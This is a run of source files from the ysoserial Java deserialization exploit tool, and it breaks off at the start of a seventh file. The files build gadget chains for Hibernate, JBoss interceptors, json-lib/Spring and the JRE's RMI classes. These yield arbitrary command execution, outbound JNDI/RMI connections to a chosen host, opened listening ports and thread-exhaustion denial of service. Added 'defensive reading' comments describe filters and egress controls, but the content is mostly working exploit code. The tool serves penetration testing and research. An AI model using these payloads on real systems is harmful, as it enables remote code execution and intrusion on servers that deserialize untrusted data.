import org.hibernate.engine.spi.TypedValue;
import org.hibernate.tuple.component.AbstractComponentTuplizer;
import org.hibernate.tuple.component.PojoComponentTuplizer;
import org.hibernate.type.AbstractType;
import org.hibernate.type.ComponentType;
import org.hibernate.type.Type;
import org.hibernate.EntityMode;

import ysoserial.payloads.annotation.Authors;
import ysoserial.payloads.annotation.PayloadTest;
import ysoserial.payloads.util.Gadgets;
import ysoserial.payloads.util.JavaVersion;
import ysoserial.payloads.util.PayloadRunner;
import ysoserial.payloads.util.Reflections;


/**
 *
 * org.hibernate.property.access.spi.GetterMethodImpl.get()
 * org.hibernate.tuple.component.AbstractComponentTuplizer.getPropertyValue()
 * org.hibernate.type.ComponentType.getPropertyValue(C)
 * org.hibernate.type.ComponentType.getHashCode()
 * org.hibernate.engine.spi.TypedValue$1.initialize()
 * org.hibernate.engine.spi.TypedValue$1.initialize()
 * org.hibernate.internal.util.ValueHolder.getValue()
 * org.hibernate.engine.spi.TypedValue.hashCode()
 *
 *
 * Requires:
 * - Hibernate (>= 5 gives arbitrary method invocation, <5 getXYZ only)
 *
 * Reviewer notes (defensive reading):
 * - NOTE(review): the frames above appear to be listed innermost first, with
 *   TypedValue.hashCode() as the call made by the outer container - confirm.
 * - The Hibernate classes act only as a "call this getter" primitive; the object the
 *   getter is invoked on comes from Gadgets.createTemplatesImpl() (see getObject).
 * - Which Hibernate generation is targeted is chosen by the JVM system properties
 *   "hibernate5" and "hibernate3"; with neither set, the Hibernate 4 getter and the
 *   4/5 caller are used.
 * - An allow-list ObjectInputFilter that omits org.hibernate types stops the chain at
 *   the first step.
 *
 * @author mbechler
 */
@Authors({ Authors.MBECHLER })
@PayloadTest(precondition = "isApplicableJavaVersion")
public class Hibernate1 implements ObjectPayload<Object>, DynamicDependencies {
    /**
     * Precondition named in {@code @PayloadTest}: delegates to JavaVersion.isAtLeast(7).
     */
    public static boolean isApplicableJavaVersion() {
        return JavaVersion.isAtLeast(7);
    }

    /**
     * Returns the Maven coordinates this payload needs.
     * If the system property "hibernate5" is set (to any value) the Hibernate 5 list is
     * returned; otherwise the Hibernate 4 list, which additionally contains dom4j.
     */
    public static String[] getDependencies () {
        if ( System.getProperty("hibernate5") != null ) {
            return new String[] {
                "org.hibernate:hibernate-core:5.0.7.Final", "aopalliance:aopalliance:1.0", "org.jboss.logging:jboss-logging:3.3.0.Final",
                "javax.transaction:javax.transaction-api:1.2"
            };
        }

        return new String[] {
            "org.hibernate:hibernate-core:4.3.11.Final", "aopalliance:aopalliance:1.0", "org.jboss.logging:jboss-logging:3.3.0.Final",
            "javax.transaction:javax.transaction-api:1.2", "dom4j:dom4j:1.6.1"
        };

    }


    /**
     * Builds a one-element getter array for {@code method} on {@code tplClass}, using the
     * Hibernate 5 variant when the system property "hibernate5" is set and the
     * Hibernate 4 variant otherwise.
     *
     * @param tplClass class that declares the method
     * @param method   name of a no-argument method declared on {@code tplClass}
     * @return an array (typed as Object) holding the single getter
     */
    public static Object makeGetter ( Class<?> tplClass, String method ) throws NoSuchMethodException, SecurityException, InstantiationException,
            IllegalAccessException, IllegalArgumentException, InvocationTargetException, ClassNotFoundException {
        if ( System.getProperty("hibernate5") != null ) {
            return makeHibernate5Getter(tplClass, method);
        }
        return makeHibernate4Getter(tplClass, method);
    }


    /**
     * Hibernate 4 variant: wraps the method in a BasicPropertyAccessor$BasicGetter.
     * Both Hibernate classes are loaded by name, so this compiles without them.
     *
     * @throws IllegalArgumentException if {@code method} does not start with "get"
     */
    public static Object makeHibernate4Getter ( Class<?> tplClass, String method ) throws ClassNotFoundException, NoSuchMethodException,
            SecurityException, InstantiationException, IllegalAccessException, IllegalArgumentException, InvocationTargetException {
        Class<?> getterIf = Class.forName("org.hibernate.property.Getter");
        Class<?> basicGetter = Class.forName("org.hibernate.property.BasicPropertyAccessor$BasicGetter");
        Constructor<?> bgCon = basicGetter.getDeclaredConstructor(Class.class, Method.class, String.class);
        Reflections.setAccessible(bgCon);

        if ( !method.startsWith("get") ) {
            throw new IllegalArgumentException("Hibernate4 can only call getters");
        }

        // property name = method name without "get", first letter lower-cased
        // NOTE(review): a method named exactly "get" passes the check above and then fails
        // here with StringIndexOutOfBoundsException
        String propName = Character.toLowerCase(method.charAt(3)) + method.substring(4);

        Object g = bgCon.newInstance(tplClass, tplClass.getDeclaredMethod(method), propName);
        // one-element array whose component type is the Getter interface
        Object arr = Array.newInstance(getterIf, 1);
        Array.set(arr, 0, g);
        return arr;
    }


    /**
     * Hibernate 5 variant: wraps the method in a GetterMethodImpl with the fixed property
     * name "test". No "get" prefix is required here, which matches the ">= 5" remark in
     * the class comment.
     */
    public static Object makeHibernate5Getter ( Class<?> tplClass, String method ) throws NoSuchMethodException, SecurityException,
            ClassNotFoundException, InstantiationException, IllegalAccessException, IllegalArgumentException, InvocationTargetException {
        Class<?> getterIf = Class.forName("org.hibernate.property.access.spi.Getter");
        Class<?> basicGetter = Class.forName("org.hibernate.property.access.spi.GetterMethodImpl");
        Constructor<?> bgCon = basicGetter.getConstructor(Class.class, String.class, Method.class);
        Object g = bgCon.newInstance(tplClass, "test", tplClass.getDeclaredMethod(method));
        Object arr = Array.newInstance(getterIf, 1);
        Array.set(arr, 0, g);
        return arr;
    }


    /**
     * Builds the payload: an object from Gadgets.createTemplatesImpl(command), a getter
     * for its "getOutputProperties" method, and the Hibernate wrapper that calls it.
     */
    public Object getObject ( String command ) throws Exception {
        Object tpl = Gadgets.createTemplatesImpl(command);
        Object getters = makeGetter(tpl.getClass(), "getOutputProperties");
        return makeCaller(tpl, getters);
    }


    /**
     * Wraps {@code tpl} and its getter array in the Hibernate structure that invokes the
     * getter. Uses the Hibernate 3 variant when the system property "hibernate3" is set,
     * the 4/5 variant otherwise.
     */
    static Object makeCaller ( Object tpl, Object getters ) throws NoSuchMethodException, InstantiationException, IllegalAccessException,
            InvocationTargetException, NoSuchFieldException, Exception, ClassNotFoundException {
        if ( System.getProperty("hibernate3") != null ) {
            return makeHibernate3Caller(tpl, getters);
        }
        return makeHibernate45Caller(tpl, getters);
    }


    /**
     * Hibernate 4/5 variant. All objects are created without running their normal
     * constructors and wired together by setting private fields.
     */
    static Object makeHibernate45Caller ( Object tpl, Object getters ) throws NoSuchMethodException, InstantiationException, IllegalAccessException,
            InvocationTargetException, NoSuchFieldException, Exception, ClassNotFoundException {
        PojoComponentTuplizer tup = Reflections.createWithoutConstructor(PojoComponentTuplizer.class);
        Reflections.getField(AbstractComponentTuplizer.class, "getters").set(tup, getters);

        // a ComponentType with a single property whose type is the ComponentType itself
        ComponentType t = Reflections.createWithConstructor(ComponentType.class, AbstractType.class, new Class[0], new Object[0]);
        Reflections.setFieldValue(t, "componentTuplizer", tup);
        Reflections.setFieldValue(t, "propertySpan", 1);
        Reflections.setFieldValue(t, "propertyTypes", new Type[] {
            t
        });

        // two TypedValues over the same type and value; "value" and "type" are set again
        // by reflection after construction with a null value
        TypedValue v1 = new TypedValue(t, null);
        Reflections.setFieldValue(v1, "value", tpl);
        Reflections.setFieldValue(v1, "type", t);

        TypedValue v2 = new TypedValue(t, null);
        Reflections.setFieldValue(v2, "value", tpl);
        Reflections.setFieldValue(v2, "type", t);

        // NOTE(review): presumably a map keyed by both values, so that hashCode() is called
        // on them when the map is read back - confirm in Gadgets.makeMap
        return Gadgets.makeMap(v1, v2);
    }


    /**
     * Hibernate 3 variant. Same wiring as the 4/5 variant, except that the tuplizer is
     * reached through an EntityMode-to-tuplizer mapping and TypedValue takes an
     * EntityMode argument.
     */
    static Object makeHibernate3Caller ( Object tpl, Object getters ) throws NoSuchMethodException, InstantiationException, IllegalAccessException,
            InvocationTargetException, NoSuchFieldException, Exception, ClassNotFoundException {
        // Load at runtime to avoid dependency conflicts
        Class entityEntityModeToTuplizerMappingClass = Class.forName("org.hibernate.tuple.entity.EntityEntityModeToTuplizerMapping");
        Class entityModeToTuplizerMappingClass = Class.forName("org.hibernate.tuple.EntityModeToTuplizerMapping");
        Class typedValueClass = Class.forName("org.hibernate.engine.TypedValue");

        PojoComponentTuplizer tup = Reflections.createWithoutConstructor(PojoComponentTuplizer.class);
        Reflections.getField(AbstractComponentTuplizer.class, "getters").set(tup, getters);
        Reflections.getField(AbstractComponentTuplizer.class, "propertySpan").set(tup, 1);

        ComponentType t = Reflections.createWithConstructor(ComponentType.class, AbstractType.class, new Class[0], new Object[0]);
        // mapping with a single entry: EntityMode.POJO -> the prepared tuplizer
        HashMap hm = new HashMap();
        hm.put(EntityMode.POJO, tup);
        Object emtm = Reflections.createWithConstructor(entityEntityModeToTuplizerMappingClass, entityModeToTuplizerMappingClass, new Class[]{ Map.class }, new Object[]{ hm });
        Reflections.setFieldValue(t, "tuplizerMapping", emtm);
        Reflections.setFieldValue(t, "propertySpan", 1);
        Reflections.setFieldValue(t, "propertyTypes", new Type[] {
            t
        });

        Constructor<?> typedValueConstructor = typedValueClass.getDeclaredConstructor(Type.class, Object.class, EntityMode.class);
        Object v1 = typedValueConstructor.newInstance(t, null, EntityMode.POJO);
        Reflections.setFieldValue(v1, "value", tpl);
        Reflections.setFieldValue(v1, "type", t);

        Object v2 = typedValueConstructor.newInstance(t, null, EntityMode.POJO);
        Reflections.setFieldValue(v2, "value", tpl);
        Reflections.setFieldValue(v2, "type", t);

        return Gadgets.makeMap(v1, v2);
    }


    // Entry point: forwards this class and the arguments to PayloadRunner.run().
    public static void main ( final String[] args ) throws Exception {
        PayloadRunner.run(Hibernate1.class, args);
    }
}


================================================
FILE: src/main/java/ysoserial/payloads/Hibernate2.java
================================================
package ysoserial.payloads;


import ysoserial.payloads.annotation.Authors;
import ysoserial.payloads.annotation.PayloadTest;
import ysoserial.payloads.util.JavaVersion;
import ysoserial.payloads.util.PayloadRunner;

import com.sun.rowset.JdbcRowSetImpl;


/**
 *
 * Another application filter bypass
 *
 * Needs a getter invocation that is provided by hibernate here
 *
 * javax.naming.InitialContext.lookup()
 * com.sun.rowset.JdbcRowSetImpl.connect()
 * com.sun.rowset.JdbcRowSetImpl.getDatabaseMetaData()
 * org.hibernate.property.access.spi.GetterMethodImpl.get()
 * org.hibernate.tuple.component.AbstractComponentTuplizer.getPropertyValue()
 * org.hibernate.type.ComponentType.getPropertyValue(C)
 * org.hibernate.type.ComponentType.getHashCode()
 * org.hibernate.engine.spi.TypedValue$1.initialize()
 * org.hibernate.engine.spi.TypedValue$1.initialize()
 * org.hibernate.internal.util.ValueHolder.getValue()
 * org.hibernate.engine.spi.TypedValue.hashCode()
 *
 *
 * Requires:
 * - Hibernate (>= 5 gives arbitrary method invocation, <5 getXYZ only)
 *
 * Arg:
 * - JNDI name (i.e. rmi:<host>)
 *
 * Yields:
 * - JNDI lookup invocation (e.g. connect to remote RMI)
 *
 * Reviewer notes (defensive reading):
 * - The Hibernate wiring is shared with Hibernate1 (makeGetter / makeCaller); only the
 *   target object differs: a JdbcRowSetImpl whose data source name is the argument.
 * - The observable effect on the deserializing host is an outbound JNDI lookup, so
 *   egress filtering and monitoring for unexpected outbound naming/RMI connections are
 *   relevant controls in addition to an allow-list ObjectInputFilter.
 *
 * @author mbechler
 */
@SuppressWarnings ( {
    "restriction"
} )
@PayloadTest(harness="ysoserial.test.payloads.JRMPReverseConnectTest", precondition = "isApplicableJavaVersion")
@Authors({ Authors.MBECHLER })
public class Hibernate2 implements ObjectPayload<Object>, DynamicDependencies {
    /**
     * Precondition named in {@code @PayloadTest}: delegates to JavaVersion.isAtLeast(7).
     */
    public static boolean isApplicableJavaVersion() {
        final boolean applicable = JavaVersion.isAtLeast(7);
        return applicable;
    }

    /**
     * Same dependency list as Hibernate1.
     */
    public static String[] getDependencies () {
        final String[] shared = Hibernate1.getDependencies();
        return shared;
    }

    /**
     * Creates a JdbcRowSetImpl with {@code command} as its data source name and wraps it
     * in the Hibernate1 caller with a getter for "getDatabaseMetaData".
     *
     * @param command the JNDI name, stored unmodified as the row set's data source name
     */
    public Object getObject ( String command ) throws Exception {
        final JdbcRowSetImpl rowSet = new JdbcRowSetImpl();
        rowSet.setDataSourceName(command);
        final Object metaDataGetter = Hibernate1.makeGetter(rowSet.getClass(), "getDatabaseMetaData");
        return Hibernate1.makeCaller(rowSet, metaDataGetter);
    }


    // Entry point: forwards this class and the arguments to PayloadRunner.run().
    public static void main ( final String[] args ) throws Exception {
        final String[] runnerArgs = args;
        PayloadRunner.run(Hibernate2.class, runnerArgs);
    }
}


================================================
FILE: src/main/java/ysoserial/payloads/JBossInterceptors1.java
================================================
package ysoserial.payloads;

import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import org.jboss.interceptor.builder.InterceptionModelBuilder;
import org.jboss.interceptor.builder.MethodReference;
import org.jboss.interceptor.proxy.DefaultInvocationContextFactory;
import org.jboss.interceptor.proxy.InterceptorMethodHandler;
import org.jboss.interceptor.reader.ClassMetadataInterceptorReference;
import org.jboss.interceptor.reader.DefaultMethodMetadata;
import org.jboss.interceptor.reader.ReflectiveClassMetadata;
import org.jboss.interceptor.reader.SimpleInterceptorMetadata;
import org.jboss.interceptor.spi.instance.InterceptorInstantiator;
import org.jboss.interceptor.spi.metadata.InterceptorReference;
import org.jboss.interceptor.spi.metadata.MethodMetadata;
import org.jboss.interceptor.spi.model.InterceptionModel;
import org.jboss.interceptor.spi.model.InterceptionType;
import ysoserial.payloads.annotation.Authors;
import ysoserial.payloads.annotation.Dependencies;
import ysoserial.payloads.annotation.PayloadTest;
import ysoserial.payloads.util.Gadgets;
import ysoserial.payloads.util.JavaVersion;
import ysoserial.payloads.util.PayloadRunner;
import ysoserial.payloads.util.Reflections;

import java.lang.reflect.Constructor;
import java.util.*;

/*
    by @matthias_kaiser

    Reviewer notes (defensive reading):
      - getObject() returns an InterceptorMethodHandler whose interception model registers
        TemplatesImpl.newTransformer() as a POST_ACTIVATE callback, and whose interceptor
        instantiator always hands back the object from Gadgets.createTemplatesImpl().
      - NOTE(review): presumably the handler runs its POST_ACTIVATE callbacks while it is
        being deserialized - confirm in jboss-interceptor-core.
      - An allow-list ObjectInputFilter that omits org.jboss.interceptor types stops the
        chain at the first step.
*/
@SuppressWarnings({"rawtypes", "unchecked"})
@PayloadTest(precondition = "isApplicableJavaVersion")
@Dependencies({ "javassist:javassist:3.12.1.GA", "org.jboss.interceptor:jboss-interceptor-core:2.0.0.Final",
    "javax.enterprise:cdi-api:1.0-SP1", "javax.interceptor:javax.interceptor-api:3.1",
    "org.jboss.interceptor:jboss-interceptor-spi:2.0.0.Final", "org.slf4j:slf4j-api:1.7.21" })
@Authors({ Authors.MATTHIASKAISER })
public class JBossInterceptors1 implements ObjectPayload<Object> {
    // Precondition named in @PayloadTest: delegates to JavaVersion.isAtLeast(7).
    public static boolean isApplicableJavaVersion() {
        final boolean applicable = JavaVersion.isAtLeast(7);
        return applicable;
    }

    /*
        Builds the InterceptorMethodHandler described in the class comment.

        command: passed unmodified to Gadgets.createTemplatesImpl().
    */
    public Object getObject(final String command) throws Exception {

        // must be final: captured by the anonymous InterceptorInstantiator below
        final Object templates = Gadgets.createTemplatesImpl(command);

        // model builder, class metadata and interceptor reference, all for HashMap
        InterceptionModelBuilder modelBuilder = InterceptionModelBuilder.newBuilderFor(HashMap.class);
        ReflectiveClassMetadata targetMetadata = (ReflectiveClassMetadata) ReflectiveClassMetadata.of(HashMap.class);
        InterceptorReference reference = ClassMetadataInterceptorReference.of(targetMetadata);

        Set<InterceptionType> lifecycleTypes = new HashSet<InterceptionType>();
        lifecycleTypes.add(InterceptionType.POST_ACTIVATE);

        // DefaultMethodMetadata's (Set, MethodReference) constructor is not accessible by default
        Constructor metadataCtor = DefaultMethodMetadata.class.getDeclaredConstructor(Set.class, MethodReference.class);
        Reflections.setAccessible(metadataCtor);
        MethodReference newTransformerRef = MethodReference.of(TemplatesImpl.class.getMethod("newTransformer"), true);
        MethodMetadata callbackMetadata = (MethodMetadata) metadataCtor.newInstance(lifecycleTypes, newTransformerRef);

        List callbacks = new ArrayList();
        callbacks.add(callbackMetadata);
        Map<InterceptionType, List<MethodMetadata>> callbacksByType = new HashMap<InterceptionType, List<MethodMetadata>>();

        callbacksByType.put(InterceptionType.POST_ACTIVATE, callbacks);
        SimpleInterceptorMetadata interceptorMetadata = new SimpleInterceptorMetadata(reference, true, callbacksByType);

        modelBuilder.interceptAll().with(interceptorMetadata);

        InterceptionModel interceptionModel = modelBuilder.build();

        HashMap targetInstance = new HashMap();
        targetInstance.put("ysoserial", "ysoserial");

        DefaultInvocationContextFactory contextFactory = new DefaultInvocationContextFactory();

        // every interceptor reference resolves to the same prepared object
        InterceptorInstantiator fixedInstantiator = new InterceptorInstantiator() {

            public Object createFor(InterceptorReference ignoredReference) {

                return templates;
            }
        };

        return new InterceptorMethodHandler(targetInstance, targetMetadata, interceptionModel, fixedInstantiator, contextFactory);

    }


    // Entry point: forwards this class and the arguments to PayloadRunner.run().
    public static void main(final String[] args) throws Exception {
        final String[] runnerArgs = args;
        PayloadRunner.run(JBossInterceptors1.class, runnerArgs);
    }
}


================================================
FILE: src/main/java/ysoserial/payloads/JRMPClient.java
================================================
package ysoserial.payloads;


import java.lang.reflect.Proxy;
import java.rmi.registry.Registry;
import java.rmi.server.ObjID;
import java.rmi.server.RemoteObjectInvocationHandler;
import java.util.Random;

import sun.rmi.server.UnicastRef;
import sun.rmi.transport.LiveRef;
import sun.rmi.transport.tcp.TCPEndpoint;
import ysoserial.payloads.annotation.Authors;
import ysoserial.payloads.annotation.PayloadTest;
import ysoserial.payloads.util.PayloadRunner;


/**
 *
 *
 * UnicastRef.newCall(RemoteObject, Operation[], int, long)
 * DGCImpl_Stub.dirty(ObjID[], long, Lease)
 * DGCClient$EndpointEntry.makeDirtyCall(Set<RefEntry>, long)
 * DGCClient$EndpointEntry.registerRefs(List<LiveRef>)
 * DGCClient.registerRefs(Endpoint, List<LiveRef>)
 * LiveRef.read(ObjectInput, boolean)
 * UnicastRef.readExternal(ObjectInput)
 *
 * Thread.start()
 * DGCClient$EndpointEntry.<init>(Endpoint)
 * DGCClient$EndpointEntry.lookup(Endpoint)
 * DGCClient.registerRefs(Endpoint, List<LiveRef>)
 * LiveRef.read(ObjectInput, boolean)
 * UnicastRef.readExternal(ObjectInput)
 *
 * Requires:
 * - JavaSE
 *
 * Argument:
 * - host:port to connect to, host only chooses random port (DOS if repeated many times)
 *
 * Yields:
 * * an established JRMP connection to the endpoint (if reachable)
 * * a connected RMI Registry proxy
 * * one system thread per endpoint (DOS)
 *
 * Reviewer notes (defensive reading):
 * - Every class in the two call stacks above ships with the JRE, so no third-party
 *   library has to be present on the deserializing application's classpath.
 * - The observable effect is an outbound JRMP connection from the deserializing host
 *   plus one thread per distinct endpoint; egress filtering and monitoring for
 *   unexpected outbound RMI traffic are relevant controls, alongside an allow-list
 *   ObjectInputFilter that omits the RMI reference types.
 *
 * @author mbechler
 */
@SuppressWarnings ( {
    "restriction"
} )
@PayloadTest( harness="ysoserial.test.payloads.JRMPReverseConnectSMTest")
@Authors({ Authors.MBECHLER })
public class JRMPClient extends PayloadRunner implements ObjectPayload<Registry> {

    /**
     * Builds a Registry proxy backed by a UnicastRef that points at the given endpoint.
     *
     * @param command {@code host:port}, or just {@code host}; without a colon the port is
     *        drawn from {@code new Random().nextInt(65535)}
     * @return a dynamic proxy implementing Registry
     * @throws NumberFormatException if the text after the first colon is not an integer
     */
    public Registry getObject ( final String command ) throws Exception {

        final int colon = command.indexOf(':');
        final boolean hostOnly = colon < 0;

        final int port;
        final String host;
        if ( hostOnly ) {
            port = new Random().nextInt(65535);
            host = command;
        }
        else {
            host = command.substring(0, colon);
            port = Integer.valueOf(command.substring(colon + 1));
        }

        // the object id is a random int (the original inline remark here read "RMI registry")
        final ObjID objectId = new ObjID(new Random().nextInt());
        final TCPEndpoint endpoint = new TCPEndpoint(host, port);
        final LiveRef liveRef = new LiveRef(objectId, endpoint, false);
        final RemoteObjectInvocationHandler handler = new RemoteObjectInvocationHandler(new UnicastRef(liveRef));

        final Class[] proxiedInterfaces = new Class[] {
            Registry.class
        };
        return (Registry) Proxy.newProxyInstance(JRMPClient.class.getClassLoader(), proxiedInterfaces, handler);
    }


    /**
     * Entry point: sets the thread's context class loader to this class's loader, then
     * forwards this class and the arguments to PayloadRunner.run().
     */
    public static void main ( final String[] args ) throws Exception {
        final ClassLoader ownLoader = JRMPClient.class.getClassLoader();
        Thread.currentThread().setContextClassLoader(ownLoader);
        PayloadRunner.run(JRMPClient.class, args);
    }
}


================================================
FILE: src/main/java/ysoserial/payloads/JRMPListener.java
================================================
package ysoserial.payloads;


import java.rmi.server.RemoteObject;
import java.rmi.server.RemoteRef;
import java.rmi.server.UnicastRemoteObject;

import sun.rmi.server.ActivationGroupImpl;
import sun.rmi.server.UnicastServerRef;
import ysoserial.payloads.annotation.Authors;
import ysoserial.payloads.annotation.PayloadTest;
import ysoserial.payloads.util.PayloadRunner;
import ysoserial.payloads.util.Reflections;


/**
 * Gadget chain:
 * UnicastRemoteObject.readObject(ObjectInputStream) line: 235
 * UnicastRemoteObject.reexport() line: 266
 * UnicastRemoteObject.exportObject(Remote, int) line: 320
 * UnicastRemoteObject.exportObject(Remote, UnicastServerRef) line: 383
 * UnicastServerRef.exportObject(Remote, Object, boolean) line: 208
 * LiveRef.exportObject(Target) line: 147
 * TCPEndpoint.exportObject(Target) line: 411
 * TCPTransport.exportObject(Target) line: 249
 * TCPTransport.listen() line: 319
 *
 * Requires:
 * - JavaSE
 *
 * Argument:
 * - Port number on which the listener is opened
 *
 * Reviewer notes (defensive reading):
 * - Every class in the chain ships with the JRE. The effect on the deserializing host
 *   is a new listening JRMP port (the chain ends in TCPTransport.listen()).
 * - The {@code @PayloadTest} annotation below skips the automated test with the reason
 *   "This test would make you potentially vulnerable": running the payload locally
 *   opens that listener on the machine doing the test.
 * - Relevant controls: an allow-list ObjectInputFilter that omits the RMI server types,
 *   host firewalling of unexpected listening ports, and monitoring for new listeners
 *   opened by Java processes.
 */
@SuppressWarnings ( {
    "restriction"
} )
@PayloadTest( skip = "This test would make you potentially vulnerable")
@Authors({ Authors.MBECHLER })
public class JRMPListener extends PayloadRunner implements ObjectPayload<UnicastRemoteObject> {

    /**
     * Creates an ActivationGroupImpl through the RemoteObject(RemoteRef) constructor with
     * a UnicastServerRef for the given port, then sets the object's "port" field to the
     * same number.
     *
     * @param command the port number as decimal text
     * @return the prepared object, typed as UnicastRemoteObject
     * @throws NumberFormatException if {@code command} is not an integer
     */
    public UnicastRemoteObject getObject ( final String command ) throws Exception {
        final int listenPort = Integer.parseInt(command);

        final Class[] ctorParamTypes = new Class[] {
            RemoteRef.class
        };
        final Object[] ctorArgs = new Object[] {
            new UnicastServerRef(listenPort)
        };
        final UnicastRemoteObject exported = Reflections.createWithConstructor(ActivationGroupImpl.class, RemoteObject.class, ctorParamTypes, ctorArgs);

        Reflections.getField(UnicastRemoteObject.class, "port").set(exported, listenPort);
        return exported;
    }


    // Entry point: forwards this class and the arguments to PayloadRunner.run().
    public static void main ( final String[] args ) throws Exception {
        final String[] runnerArgs = args;
        PayloadRunner.run(JRMPListener.class, runnerArgs);
    }
}


================================================
FILE: src/main/java/ysoserial/payloads/JSON1.java
================================================
package ysoserial.payloads;


import ysoserial.payloads.annotation.Authors;
import ysoserial.payloads.annotation.Dependencies;
import ysoserial.payloads.util.Gadgets;
import ysoserial.payloads.util.PayloadRunner;
import ysoserial.payloads.util.Reflections;

import java.lang.reflect.InvocationHandler;
import java.lang.reflect.InvocationTargetException;
import java.util.HashMap;
import java.util.Map;

import javax.management.openmbean.CompositeData;
import javax.management.openmbean.CompositeType;
import javax.management.openmbean.OpenDataException;
import javax.management.openmbean.OpenType;
import javax.management.openmbean.TabularDataSupport;
import javax.management.openmbean.TabularType;

import javax.xml.transform.Templates;

import org.springframework.aop.framework.AdvisedSupport;
import net.sf.json.JSONObject;


/**
 *
 * A bit more convoluted example
 *
 * com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl.getOutputProperties()
 * java.lang.reflect.Method.invoke(Object, Object...)
 * org.springframework.aop.support.AopUtils.invokeJoinpointUsingReflection(Object, Method, Object[])
 * org.springframework.aop.framework.JdkDynamicAopProxy.invoke(Object, Method, Object[])
 * $Proxy0.getOutputProperties()
 * java.lang.reflect.Method.invoke(Object, Object...)
 * org.apache.commons.beanutils.PropertyUtilsBean.invokeMethod(Method, Object, Object[])
 * org.apache.commons.beanutils.PropertyUtilsBean.getSimpleProperty(Object, String)
 * org.apache.commons.beanutils.PropertyUtilsBean.getNestedProperty(Object, String)
 * org.apache.commons.beanutils.PropertyUtilsBean.getProperty(Object, String)
 * org.apache.commons.beanutils.PropertyUtils.getProperty(Object, String)
 * net.sf.json.JSONObject.defaultBeanProcessing(Object, JsonConfig)
 * net.sf.json.JSONObject._fromBean(Object, JsonConfig)
 * net.sf.json.JSONObject.fromObject(Object, JsonConfig)
 * net.sf.json.JSONObject(AbstractJSON)._processValue(Object, JsonConfig)
 * net.sf.json.JSONObject._processValue(Object, JsonConfig)
 * net.sf.json.JSONObject.processValue(Object, JsonConfig)
 * net.sf.json.JSONObject.containsValue(Object, JsonConfig)
 * net.sf.json.JSONObject.containsValue(Object)
 * javax.management.openmbean.TabularDataSupport.containsValue(CompositeData)
 * javax.management.openmbean.TabularDataSupport.equals(Object)
 * java.util.HashMap<K,V>.putVal(int, K, V, boolean, boolean)
 * java.util.HashMap<K,V>.readObject(ObjectInputStream)
 *
 * @author mbechler
 *
 */
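@SuppressWarnings ( {
    "rawtypes", "unchecked", "restriction"
} )
@Dependencies({ "net.sf.json-lib:json-lib:jar:jdk15:2.4", "org.springframework:spring-aop:4.1.4.RELEASE",
    // deep deps
    "aopalliance:aopalliance:1.0", "commons-logging:commons-logging:1.2", "commons-lang:commons-lang:2.6",
    "net.sf.ezmorph:ezmorph:1.0.6", "commons-beanutils:commons-beanutils:1.9.2",
    "org.springframework:spring-core:4.1.4.RELEASE", "commons-collections:commons-collections:3.1" })
@Authors({ Authors.MBECHLER })
public class JSON1 implements ObjectPayload<Object> {

    /**
     * Builds the map for the chain in the class comment around the object returned
     * by Gadgets.createTemplatesImpl(command), exposing it through the Templates
     * interface only.
     *
     * @param command passed unchanged to Gadgets.createTemplatesImpl
     * @return the map produced by makeCallerChain
     * @throws Exception if the reflective setup fails
     */
    public Map getObject ( String command ) throws Exception {
        return makeCallerChain(Gadgets.createTemplatesImpl(command), Templates.class);
    }


    /**
     * Will call all getter methods on payload that are defined in the given interfaces
     *
     * Two TabularDataSupport instances are given the same JSONObject as their
     * dataMap and returned through Gadgets.makeMap. Following the chain in the class
     * comment, HashMap.readObject compares the two keys, TabularDataSupport.equals
     * calls containsValue on the JSONObject, and json-lib's bean processing reads the
     * properties of the proxy stored under "t". The chain names classes from the
     * libraries listed in @Dependencies, so those are presumably what must be
     * present on the deserializing side.
     *
     * @param payload object whose getters are to be reached; installed as the AdvisedSupport target
     * @param ifaces  interfaces, in addition to CompositeData, implemented by the proxy
     * @return the map produced by Gadgets.makeMap(t1, t2)
     */
    public static Map makeCallerChain ( Object payload, Class... ifaces ) throws OpenDataException, NoSuchMethodException, InstantiationException,
            IllegalAccessException, InvocationTargetException, Exception, ClassNotFoundException {
        // Minimal open type: a single INTEGER item named "a", which is also the index
        // of the tabular type shared by both TabularDataSupport instances.
        CompositeType rt = new CompositeType("a", "b", new String[] {
            "a"
        }, new String[] {
            "a"
        }, new OpenType[] {
            javax.management.openmbean.SimpleType.INTEGER
        });
        TabularType tt = new TabularType("a", "b", rt, new String[] {
            "a"
        });
        TabularDataSupport t1 = new TabularDataSupport(tt);
        TabularDataSupport t2 = new TabularDataSupport(tt);

        // we need to make payload implement composite data
        // it's very likely that there are other proxy impls that could be used
        AdvisedSupport as = new AdvisedSupport();
        as.setTarget(payload);
        InvocationHandler delegateInvocationHandler = (InvocationHandler) Reflections.newInstance("org.springframework.aop.framework.JdkDynamicAopProxy", as);
        // Handler registered for CompositeData calls; built from a one-entry map keyed
        // "getCompositeType" (presumably answers that method with rt -- confirm in Gadgets).
        InvocationHandler cdsInvocationHandler = Gadgets.createMemoizedInvocationHandler(Gadgets.createMap("getCompositeType", rt));
        InvocationHandler invocationHandler = (InvocationHandler) Reflections.newInstance("com.sun.corba.se.spi.orbutil.proxy.CompositeInvocationHandlerImpl");
        ((Map) Reflections.getFieldValue(invocationHandler, "classToInvocationHandler")).put(CompositeData.class, cdsInvocationHandler);
        // Everything that is not registered above goes to the Spring AOP proxy handler.
        Reflections.setFieldValue(invocationHandler, "defaultHandler", delegateInvocationHandler);
        final CompositeData cdsProxy = Gadgets.createProxy(invocationHandler, CompositeData.class, ifaces);

        // The JSONObject's backing map is replaced reflectively, so put() is never
        // called with the proxy while the payload is being built.
        JSONObject jo = new JSONObject();
        Map m = new HashMap();
        m.put("t", cdsProxy);
        Reflections.setFieldValue(jo, "properties", m);
        Reflections.setFieldValue(t1, "dataMap", jo);
        Reflections.setFieldValue(t2, "dataMap", jo);
        return Gadgets.makeMap(t1, t2);
    }

    /**
     * Command-line entry point; delegates to PayloadRunner.run for this class.
     */
    public static void main ( final String[] args ) throws Exception {
        PayloadRunner.run(JSON1.class, args);
    }

}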


================================================
FILE: src/main/java/ysoserial/payloads/JavassistWeld1.java
================================================
package ysoserial.payloads;

import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import org.jboss.weld.interceptor.builder.InterceptionModelBuilder;
import org.jboss.weld.interceptor.builder.MethodReference;
import org.jboss.weld.interceptor.proxy.DefaultInvocationContextFactory;
import org.jboss.weld.interceptor.proxy.InterceptorMethodHandler;
import org.jboss.weld.interceptor.reader.ClassMetadataInterceptorReference;
